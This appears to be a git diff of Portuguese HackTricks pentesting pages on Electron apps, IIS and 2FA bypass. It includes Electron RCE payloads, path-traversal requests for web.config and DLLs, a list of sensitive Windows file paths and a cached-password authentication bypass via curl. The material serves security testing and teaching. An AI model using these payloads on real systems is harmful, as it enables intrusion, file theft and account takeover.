<summary><strong>Aprenda hacking da AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Especialista em Equipe Vermelha AWS do HackTricks)</strong></a><strong>!</strong></summary>
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Outras formas de apoiar o HackTricks:
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}

74
network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
View file

@ -2,23 +2,37 @@
<details>
<summary><strong>Aprenda hacking da AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares stealers**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Introdução
O Electron combina um backend local (com **NodeJS**) e um frontend (**Chromium**), embora falte alguns dos mecanismos de segurança dos navegadores modernos.
O Electron combina um backend local (com **NodeJS**) e um frontend (**Chromium**), embora falte alguns mecanismos de segurança dos navegadores modernos.
Normalmente, você pode encontrar o código do aplicativo Electron dentro de um aplicativo `.asar`, para obter o código, você precisa extraí-lo:
Normalmente, você pode encontrar o código do aplicativo Electron dentro de um aplicativo `.asar`, para obter o código, você precisa extrai-lo:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
@ -29,12 +43,12 @@ No código-fonte de um aplicativo Electron, dentro de `packet.json`, você pode
"name": "standard-notes",
"main": "./app/index.js",
```
Electron tem 2 tipos de processos:
Electron possui 2 tipos de processos:
* Processo Principal (tem acesso completo ao NodeJS)
* Processo de Renderização (deve ter acesso restrito ao NodeJS por razões de segurança)
* Processo de Renderização (deve ter acesso restrito ao NodeJS por motivos de segurança)
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
![](<../../../.gitbook/assets/image (179).png>)
Um **processo de renderização** será uma janela do navegador carregando um arquivo:
```javascript
@ -54,8 +68,8 @@ A aplicação Electron **pode acessar o dispositivo** via APIs do Node, embora p
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - está desativado por padrão. Irá restringir as ações que o NodeJS pode executar.
* Integração do Node em Workers
* **`nodeIntegrationInSubframes`** - está `desativado` por padrão.
* Se **`nodeIntegration`** estiver **habilitado**, isso permitiria o uso das **APIs do Node.js** em páginas da web que são **carregadas em iframes** dentro de uma aplicação Electron.
* Se **`nodeIntegration`** estiver **desabilitado**, então os preloads serão carregados no iframe
* Se a **`nodeIntegration`** estiver **habilitada**, isso permitirá o uso das **APIs do Node.js** em páginas da web que são **carregadas em iframes** dentro de uma aplicação Electron.
* Se a **`nodeIntegration`** estiver **desabilitada**, então os preloads serão carregados no iframe
Exemplo de configuração:
```javascript
@ -83,7 +97,7 @@ spellcheck: true
}
};
```
Alguns **payloads de RCE** da [qui](https://7as.es/electron/nodeIntegration\_rce.txt):
Alguns **cargas RCE** da [aqui](https://7as.es/electron/nodeIntegration\_rce.txt):
```html
Example Payloads (Windows):
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
@ -97,7 +111,7 @@ Example Payloads (Linux & MacOS):
```
### Captura de tráfego
Modifique a configuração start-main e adicione o uso de um proxy, como:
Modifique a configuração start-main e adicione o uso de um proxy como:
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
@ -119,7 +133,7 @@ require('child_process').exec('calc');
top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>
```
<figure><img src="../../../.gitbook/assets/image (5) (4).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (1107).png" alt=""><figcaption></figcaption></figure>
## RCE: preload
@ -132,7 +146,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
Portanto, o script pode exportar recursos do nó para páginas:
Portanto, o script pode exportar recursos de nó para páginas:
{% code title="preload.js" %}
```javascript
@ -166,7 +180,7 @@ Se os contextos não estiverem isolados, um atacante pode:
1. Executar **JavaScript arbitrário no renderizador** (XSS ou navegação para sites externos)
2. **Sobrescrever o método integrado** que é usado no código de pré-carregamento ou no código interno do Electron para uma função própria
3. **Disparar** o uso da **função sobrescrita**
3. **Acionar** o uso da **função sobrescrita**
4. RCE?
Existem 2 lugares onde os métodos integrados podem ser sobrescritos: No código de pré-carregamento ou no código interno do Electron:
@ -195,7 +209,7 @@ Para mais informações sobre esses exemplos, consulte [https://shabarkin.medium
Ao implantar um aplicativo de desktop Electron, garantir as configurações corretas para `nodeIntegration` e `contextIsolation` é crucial. Está estabelecido que a **execução de código remoto do lado do cliente (RCE)** direcionada a scripts de pré-carregamento ou código nativo do Electron a partir do processo principal é efetivamente impedida com essas configurações em vigor.
Quando um usuário interage com links ou abre novas janelas, ouvintes de eventos específicos são acionados, os quais são cruciais para a segurança e funcionalidade do aplicativo:
Ao interagir com links ou abrir novas janelas, ouvintes de eventos específicos são acionados, sendo cruciais para a segurança e funcionalidade do aplicativo:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
@ -204,9 +218,9 @@ Estes ouvintes são **substituídos pela aplicação desktop** para implementar
**Aqui está um pseudocódigo simplificado:**
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (258).png>)
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (620).png>)
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
As melhores práticas de segurança do Electron JS desaconselham aceitar conteúdo não confiável com a função `openExternal`, pois isso poderia levar a RCE por meio de vários protocolos. Sistemas operacionais suportam diferentes protocolos que podem acionar RCE. Para exemplos detalhados e uma explicação mais aprofundada sobre este tópico, pode-se consultar [este recurso](https://positive.security/blog/url-open-rce#windows-10-19042), que inclui exemplos de protocolos do Windows capazes de explorar essa vulnerabilidade.
@ -228,9 +242,9 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
**Desativar `contextIsolation` permite o uso de tags `<webview>`, semelhantes ao `<iframe>`, para ler e exfiltrar arquivos locais**. Um exemplo fornecido demonstra como explorar essa vulnerabilidade para ler o conteúdo de arquivos internos:
![](../../../.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png)
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
Além disso, outro método para **ler um arquivo interno** é compartilhado, destacando uma vulnerabilidade crítica de leitura de arquivo local em um aplicativo de desktop Electron. Isso envolve a injeção de um script para explorar o aplicativo e exfiltrar dados:
Além disso, outro método para **ler um arquivo interno** é compartilhado, destacando uma vulnerabilidade crítica de leitura de arquivos locais em um aplicativo de desktop Electron. Isso envolve a injeção de um script para explorar o aplicativo e exfiltrar dados:
```html
<br><BR><BR><BR>
<h1>pwn<br>
@ -305,16 +319,28 @@ npm start
* Mais pesquisas e artigos sobre a segurança do Electron em [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

58
network-services-pentesting/pentesting-web/iis-internet-information-services.md
View file

@ -1,4 +1,4 @@
# IIS - Internet Information Services
# IIS - Serviços de Informação na Internet
<details>
@ -14,7 +14,21 @@ Outras maneiras de apoiar o HackTricks:
</details>
Testar extensões de arquivos executáveis:
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
Testar extensões de arquivo executáveis:
* asp
* aspx
@ -24,14 +38,11 @@ Testar extensões de arquivos executáveis:
## Divulgação de Endereço IP Interno
Em qualquer servidor IIS onde você obtenha um 302, você pode tentar remover o cabeçalho Host e usar HTTP/1.0 e dentro da resposta o cabeçalho Location pode apontar para o endereço IP interno:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
Resposta revelando o IP interno:
```
GET / HTTP/1.0
@ -42,7 +53,6 @@ Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
## Executar arquivos .config
Você pode fazer upload de arquivos .config e usá-los para executar código. Uma maneira de fazer isso é anexar o código ao final do arquivo dentro de um comentário HTML: [Baixe o exemplo aqui](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
@ -78,24 +88,22 @@ A partir dos **Dlls baixados**, também é possível encontrar **novos namespace
Além disso, os arquivos **connectionstrings.config** e **global.asax** podem conter informações interessantes.\\
{% endhint %}
Nas aplicações **.Net MVC**, o arquivo **web.config** desempenha um papel crucial ao especificar cada arquivo binário nos quais a aplicação depende por meio das tags XML **"assemblyIdentity"**.
Nas aplicações **.Net MVC**, o arquivo **web.config** desempenha um papel crucial ao especificar cada arquivo binário nos quais a aplicação depende por meio de tags XML **"assemblyIdentity"**.
### **Explorando Arquivos Binários**
Um exemplo de acesso ao arquivo **web.config** é mostrado abaixo:
```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
Este pedido revela várias configurações e dependências, tais como:
* Versão do **EntityFramework**
* **AppSettings** para páginas da web, validação de cliente e JavaScript
* Configurações do **System.web** para autenticação e tempo de execução
* Configurações de módulos do **System.webServer**
* Associações de montagem do **Runtime** para várias bibliotecas como **Microsoft.Owin**, **Newtonsoft.Json** e **System.Web.Mvc**
* Associações de montagem do **Runtime** para numerosas bibliotecas como **Microsoft.Owin**, **Newtonsoft.Json** e **System.Web.Mvc**
Essas configurações indicam que certos arquivos, como **/bin/WebGrease.dll**, estão localizados dentro da pasta /bin da aplicação.
@ -106,21 +114,17 @@ Arquivos encontrados no diretório raiz, como **/global.asax** e **/connectionst
### **Namespaces e Web.Config**
Aplicações MVC também definem arquivos **web.config** adicionais para namespaces específicos a fim de evitar declarações repetitivas em cada arquivo, como demonstrado em um pedido para baixar outro **web.config**:
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **Baixando DLLs**
A menção de um namespace personalizado sugere a existência de uma DLL chamada "**WebApplication1**" presente no diretório /bin. Em seguida, é mostrada uma solicitação para baixar o **WebApplication1.dll**:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
Isso sugere a presença de outros DLLs essenciais, como **System.Web.Mvc.dll** e **System.Web.Optimization.dll**, no diretório /bin.
Em um cenário onde um DLL importa um namespace chamado **WebApplication1.Areas.Minded**, um atacante pode inferir a existência de outros arquivos web.config em caminhos previsíveis, como **/nome-da-área/Views/**, contendo configurações específicas e referências a outros DLLs na pasta /bin. Por exemplo, uma solicitação para **/Minded/Views/web.config** pode revelar configurações e namespaces que indicam a presença de outro DLL, **WebApplication1.AdditionalFeatures.dll**.
@ -128,7 +132,6 @@ Em um cenário onde um DLL importa um namespace chamado **WebApplication1.Areas.
### Arquivos comuns
De [aqui](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
@ -205,12 +208,11 @@ C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## Erro 404 HTTPAPI 2.0
Se você encontrar um erro como o seguinte:
![](https://github.com/carlospolop/hacktricks/blob/pt/.gitbook/assets/image%20\(446\)%20\(1\)%20\(2\)%20\(2\)%20\(3\)%20\(3\)%20\(2\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(13\).png)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
Isso significa que o servidor **não recebeu o nome de domínio correto** no cabeçalho Host.\
Para acessar a página da web, você pode verificar o **Certificado SSL** fornecido e talvez encontrar o nome do domínio/subdomínio lá. Se não estiver lá, pode ser necessário **forçar VHosts** até encontrar o correto.
@ -224,7 +226,7 @@ A principal limitação dessa técnica, se o servidor for vulnerável, é que **
Você pode usar [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) para testar essa vulnerabilidade:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../.gitbook/assets/image (183).png>)
![](<../../.gitbook/assets/image (841).png>)
Pesquisa original: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
@ -242,11 +244,11 @@ O ASP.NET inclui um modo de depuração e seu arquivo é chamado `trace.axd`.
Ele mantém um log muito detalhado de todas as solicitações feitas a uma aplicação ao longo do tempo.
Essas informações incluem IPs de clientes remotos, IDs de sessão, todos os cookies de solicitação e resposta, caminhos físicos, informações de código-fonte e potencialmente até nomes de usuário e senhas.
Essas informações incluem IPs de clientes remotos, IDs de sessão, todos os cookies de solicitação e resposta, caminhos físicos, informações de código-fonte e potencialmente até mesmo nomes de usuário e senhas.
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
![Captura de tela 2021-03-30 às 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
## Cookie ASPXAUTH
@ -262,8 +264,7 @@ Este ataque funcionou neste [**relato**](https://infosecwriteups.com/how-i-hacke
## Bypass de Autenticação do IIS com senhas em cache (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Relatório completo aqui](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Um bug no código **não verificava corretamente a senha fornecida pelo usuário**, então um atacante cujo **hash da senha atinge uma chave** que já está no **cache** poderá fazer login como esse usuário.
[Relatório completo aqui](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Um bug no código **não verificava corretamente a senha fornecida pelo usuário**, então um atacante cujo **hash da senha atinge uma chave** que já está em **cache** poderá fazer login como esse usuário.
```python
# script for sanity check
> type test.py
@ -283,6 +284,17 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares stealers**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
@ -294,6 +306,6 @@ Outras maneiras de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

64
pentesting-web/2fa-bypass.md
View file

@ -1,24 +1,38 @@
# 2FA/OTP Bypass
# Bypass de 2FA/OTP
<details>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks Especialista em Equipe Vermelha AWS)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## **Técnicas Avançadas de Bypass de Autenticação de Dois Fatores**
### **Acesso Direto ao Endpoint**
Para contornar o 2FA, acesse diretamente o endpoint subsequente, conhecendo o caminho é crucial. Se não tiver sucesso, altere o **cabeçalho Referrer** para imitar a navegação a partir da página de verificação do 2FA.
Para contornar o 2FA, acesse diretamente o endpoint subsequente, sendo crucial conhecer o caminho. Se não for bem-sucedido, altere o **cabeçalho Referrer** para imitar a navegação a partir da página de verificação do 2FA.
### **Reutilização de Token**
@ -30,11 +44,11 @@ Extrair um token de sua própria conta para contornar o 2FA em outra conta pode
### **Exposição do Token**
Investigar se o token é divulgado em uma resposta da aplicação web.
Investigar se o token é revelado em uma resposta da aplicação web.
### **Exploração do Link de Verificação**
Usar o **link de verificação por e-mail enviado durante a criação da conta** pode permitir o acesso ao perfil sem 2FA, como destacado em um [post](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b) detalhado.
Usar o **link de verificação por e-mail enviado durante a criação da conta** pode permitir acesso ao perfil sem 2FA, como destacado em um post detalhado [aqui](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b).
### **Manipulação de Sessão**
@ -42,7 +56,7 @@ Iniciar sessões para a conta do usuário e da vítima, e completar o 2FA para a
### **Mecanismo de Redefinição de Senha**
Investigar a função de redefinição de senha, que faz login de um usuário na aplicação pós-redefinição, para seu potencial de permitir várias redefinições usando o mesmo link é crucial. Fazer login com as novas credenciais redefinidas pode contornar o 2FA.
Investigar a função de redefinição de senha, que faz login do usuário na aplicação pós-redefinição, para verificar seu potencial de permitir várias redefinições usando o mesmo link é crucial. Fazer login com as novas credenciais redefinidas pode contornar o 2FA.
### **Comprometimento da Plataforma OAuth**
@ -52,17 +66,17 @@ Comprometer a conta de um usuário em uma plataforma **OAuth** confiável (por e
#### **Ausência de Limite de Taxa**
A falta de um limite no número de tentativas de código permite ataques de força bruta, embora um possível limite de taxa silencioso deva ser considerado.
A falta de um limite no número de tentativas de código permite ataques de força bruta, embora um potencial limite de taxa silencioso deva ser considerado.
#### **Força Bruta Lenta**
Um ataque de força bruta lento é viável onde existem limites de taxa de fluxo sem um limite de taxa geral.
Um ataque de força bruta lento é viável onde existem limites de taxa de fluxo sem um limite geral de taxa.
#### **Redefinição do Limite de Reenvio de Código**
O reenvio do código redefine o limite de taxa, facilitando tentativas contínuas de força bruta.
#### **Circunvenção do Limite de Taxa do Lado do Cliente**
#### **Contorno de Limite de Taxa do Lado do Cliente**
Um documento detalha técnicas para contornar a limitação de taxa do lado do cliente.
@ -86,7 +100,7 @@ Explorar condições de corrida para contornar o 2FA pode ser encontrado em um d
Explorar vulnerabilidades CSRF ou Clickjacking para desativar o 2FA é uma estratégia viável.
### **Exploração de Recursos "Lembrar-me"**
### **Exploração do Recurso "Lembrar-me"**
#### **Valores de Cookie Previsíveis**
@ -94,7 +108,7 @@ Adivinhar o valor do cookie "lembrar-me" pode contornar restrições.
#### **Impersonação de Endereço IP**
Impersonar o endereço IP da vítima através do cabeçalho **X-Forwarded-For** pode contornar restrições.
Impersonar o endereço IP da vítima por meio do cabeçalho **X-Forwarded-For** pode contornar restrições.
### **Utilização de Versões Antigas**
@ -112,35 +126,21 @@ Encerrar sessões existentes ao ativar o 2FA protege as contas contra acesso nã
### **Falhas de Controle de Acesso com Códigos de Backup**
A geração imediata e a possível recuperação não autorizada de códigos de backup ao ativar o 2FA, especialmente com misconfigurações CORS/vulnerabilidades XSS, representam um risco.
A geração imediata e a possível recuperação não autorizada de códigos de backup ao ativar o 2FA, especialmente com misconfigurações de CORS/vulnerabilidades XSS, representam um risco.
### **Divulgação de Informações na Página de 2FA**
A divulgação de informações sensíveis (por exemplo, número de telefone) na página de verificação do 2FA é uma preocupação.
### **Redefinição de Senha Desativando o 2FA**
### **Desativação do Reset de Senha 2FA**
Um processo que demonstra um método potencial de contorno envolve a criação de conta, ativação do 2FA, redefinição de senha e login subsequente sem a exigência de 2FA.
### **Solicitações Falsas**
Utilizar solicitações falsas para obscurecer tentativas de força bruta ou enganar mecanismos de limitação de taxa adiciona outra camada às estratégias de contorno. Criar tais solicitações requer uma compreensão sutil das medidas de segurança e comportamentos de limitação de taxa da aplicação.
Utilizar solicitações falsas para obscurecer tentativas de força bruta ou enganar mecanismos de limitação de taxa adiciona outra camada às estratégias de contorno. Criar tais solicitações requer uma compreensão sutil das medidas de segurança da aplicação e comportamentos de limitação de taxa.
## Referências
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
<details>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks Especialista em Equipe Vermelha AWS)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
